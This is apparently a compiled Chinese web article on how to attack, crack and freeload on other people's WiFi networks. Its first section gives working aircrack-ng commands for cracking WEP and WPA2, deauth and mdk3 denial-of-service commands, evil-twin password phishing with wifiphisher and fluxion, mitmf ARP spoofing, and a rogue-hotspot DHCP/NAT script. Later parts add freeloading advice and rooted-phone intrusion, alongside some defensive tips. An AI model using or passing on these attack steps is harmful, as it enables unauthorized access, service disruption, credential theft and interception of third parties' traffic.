目录：

• 1、怎么攻击别人wifi？
• 2、如何蹭别人家的Wifi
• 3、黑客怎么想的，怎么做的，如何通过wifi入侵公司
• 4、黑客小猛入侵wifi怎么入侵的

怎么攻击别人wifi？

1.保密性

我们攻击WIFI的第一个思路就是从保密性出发，我们希望从无线系统中获取用户的明文数据。首先，我们知道WIFI的的认证加密主要有以下四种方式：OPEN（无加密）、WEP（RC4）、WPA（TKIP）、WPA2（CCMP）。

OPEN的WIFI没有采取认证加密措施，任意用户均可链接WIFI，用户数据在BSS（基本服务集）中明文传输，恶意用户没有任何门槛就可连接，然后通过中间人攻击即可获取用户的数据（SSL、SSH等需要其他工具）。如下图所示：

WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码，然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了，WEP抓取IVS包，WPA/WPA2抓取handshake包。

WEP大概如下：

airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包

aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs

aircrack-ng /workspace/sniff/airmon02.ivs

WPA/WPA2大概如下：

airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据，抓取handshake包

aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包，更快的获取handshake

aircrack-ng -w 你的字典文件 /workspace/sniff/airmon-wpa2.cap #破解wpa2密码

密码破解成功后即可连接AP，通过中间人的方式获取用户明文数据，或者直接用wireshark抓取加密包，然后通过airdecap-ng工具解密，然后用wireshark读取已经解密的数据包。

破解WPA、WPA2不一定成功，取决于你字典是否强大，此时我们可以想办法诱骗用户主动输入WIFI密码，比如我们创建一个和目标AP具有同样ESSID的软AP，用户可以连接上，单在浏览网页时会弹出一个虚假的认证页面，告诉用户必须输入WIFI的密码，用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。

wifiphisher将用户输入的密码当做WIFI的密码，但此密码并没有去验证，如果用户输入错误，也会提示出该密码。

而fluxion会将用户输入的密码与handshake校验，成功方认为获取到密码。

2.可用性

通过使目标用户无法使用WIFI来破坏无线系统的可用性，通常通过DOS攻击来实现，比如发送大量的deauth包来迫使用户station与AP解除认证、连接。

aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包，迫使目标station无法连接AP

mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接，从而耗尽AP的资源造成DOS攻击

3.真实性

（1）恶意用户进入无线系统后，可通过中间人攻击获取或修改用户数据。

ARP欺骗或DNS欺骗，ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有图片上下颠倒。

mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet

通过driftnet工具抓取目标浏览网页时的图片

driftnet -i wlan0

当然还可以利用中间人攻击做很多事情，比如获取cookie，嵌入js，结合beef进一步攻击等等。。。

（2）伪造AP进行钓鱼攻击

airbase -ng -e airmon wlan1mon #创建钓鱼热点

然后通过下面的脚本开启dhcp服务器（必须先安装isc-dhcp-server），开启路由，开启系统转发，开启防火墙nat等。

1 #!/bin/bash 2 3 echo '配置钓鱼热点...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待启动dhcp服务器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

此时用户可以不用密码即可连接airmon热点，并可以上网，但此时可以通过嗅探at0网卡获取用户数据。

4.完整性

篡改用户数据，在WIFI攻击这块貌似用处不大。

5.不可抵赖性

如何蹭别人家的Wifi

连别人家的wifi的方法主要有如下三种：

1，腿儿着去问密码。

2，使用Wi-Fi密码破解工具，如EWSA Pro对Wi-Fi密码进行破解。

3，使用如“Wi-Fi万能钥匙”这类APP获取附近的Wi-Fi密码。

等会儿？这才过了半分钟，蹭Wi-Fi的方法就讲完了？还没有. 福利在后面。

咱们分析一下三种方式的优缺点。

1，腿儿着去问，如果颜值不高有可能被拒哦。

2，破解时间长，很可能在获得破解密码之前Wi-Fi主人已经更换了新的密码。

3，使用如“Wi-Fi万能钥匙”这类APP获取附近的Wi-Fi密码。

首先要了解的是，“Wi-Fi万能钥匙类的工具为什么会有大量的Wi-Fi密码可供使用。

Wi-Fi密码软件本身即是获取Wi-Fi密码的工具。

获取安装该软件用户连接过的WiFi的密码，这是WiFi万能钥匙需要攻克的第一个难题，攻克之后，从一个用户身上可以挖到1-10个Wi-Fi ID和Wi-Fi密码。

很多保存下来的密码都是明文的，或者是只经过了简单的加密操作，如果用户root了自己的手机，软件可以随意获取。

显然，WiFi万能钥匙有一个自己的云端，储存了大量从用户手机里攫取到的Wi-Fi信息。

由于民众对快速上网的极度渴望，偶然听到或者看到有这么个神器，当机立断将其下载到了手机上，在这两年时间间，该软件的用户量达到了5亿之多。

初次打开软件的时候，你应该看到了它会向你申请「获取位置信息」的请求，目的有两个，第一是获取你所在区域的大概位置。

然后将该位置附近的WiFi信息全部缓存到你的客户端，这样做可以大大地减少对服务器的压力，其二，目前WiFi万能钥匙也会做一些商品/商家的推广，拿到位置信息方便个性化投放。

1.密码匹配

以前手机没有提供权限给它获取Wi-Fi列表，所以软件会引导用户将WiFi列表界面截图，然后通过图片分析拿到WiFi名称。而如今，iOS设备不仅提供了获取周边WiFi列表的权限。

最初，软件只能通过WiFi名称进行匹配，而现在可以使用WiFi的其他信息如（MAC地址）进行匹配，匹配度更高，避免Wi-Fi名称重复问题导致的密码不匹配。

2.撞库分析

在拥有了几亿的数据之后，这可谓是真正的大数据，自然少不了对数据进行统计和分析，拿到一些常用的弱口令，如八个8、四个123、八个0等。

了解路由设置和WiFi设置的人本来就不多，很多上门服务的师傅一般就将密码设置成简单好记的，这也很大程度提高了撞库的成功率。

对于拿不到密码的WiFi，软件毫无疑问会作出这种尝试，成本低、成功率还高。

蹭网与被蹭存在的危害。

如果家里的网络被小白用户蹭了，无非就是大家同时上网的时候，网速会慢一点，而如果你家网络被一个具备黑客素质的人蹭上了，这个时候可能需要引起注意了。

如果你家里有WiFi，那么一定会有一个路由器吧，路由器的密码还是初始状态的guest/admin么，或者被你设置成了六个8。

如果我是这个攻击者，一定会想各种办法拿到你们家路由器的密码，如果运气好进去了，下一步要做的事情就是把路由器的网关设置成我自己的电脑，然后各种截获和注入。

如果没有攻克路由器，也可以利用在一个局域网内的条件，通过共享、网络广播等各种欺骗手段忽悠小白用户上当，方法总是很多的。

只要打开一个口子，基本上你的手机/电脑就被控制了，投毒、欺骗、诱骗等，能用上的都会用上。

你手机上没有安装Wi-Fi万能钥匙，也没有将密码告诉旁边的邻居、路人，结果发现自己的网络还是被蹭到了。为啥呢？原来上个月你家亲戚来过，然后他手机上有这个软件。

防止被蹭的最好的方式就是，密码不告诉任何人，即便是亲戚。现在的路由器默认可以设置两个Wi-Fi，并且可以对sub-Wi-Fi进行流量限制。

当然，有些WiFi做的比较成熟，可以通过自己的手机监控连接的设备，然后设置白名单和黑名单。不过估计用这种WiFi的人不会很多，一般的Wi-Fi也支持在Web界面上控制上网设备。

还有一种方式是，在路由器中，将无线设置的SSID广播改为「隐藏」，周边设备就没办法找到你家的WiFi网络了。

如果真的想蹭网，建议可用“Wi-Fi密码获取软件”在一部没有Wi-Fi密码保存的设备上获取密码，或者使用EWSA Pro类工具自行获取密码，尽量不要在日常使用的设备上安装“Wi-Fi密码获取软件”，它将让你的无线网络变得不安全。

黑客怎么想的，怎么做的，如何通过wifi入侵公司

先破解wifi密码，这个密码指的是wifi的使用验证密码，这样黑客就可以加入这个无线网卡，黑客的设备也会成为无线网的一员。然后黑客会对连入无线网络的设备运用ARP欺骗、中间人攻击、嗅探、DNS欺骗等攻击手段，从而获得这些设备上的敏感信息（可以是公司信息也可以是帐号密码）。

黑客小猛入侵wifi怎么入侵的

WiFi其实就是一个数据传输的通道，是一个连接互联网的路线。

第一种方法，上网都是通过一个一个数据包去通讯的，所以黑客都是去抓这个数据包，大概的抓包软件网上一搜全是的，这是工具党喜欢用的，然后抓完包之后就可以使用软件去破解，得出来的就是信息，包括手机信息。

第二种方法，如果手机越狱过，或者ROOT，就可以在一个WIFI中进入手机，当然，可以破解root密码，这个我试过，需要运气，因为连在一个WiFi的手机也不知道有没有root或者越狱过。只要得出密码，就可以远程进入手机文件系统。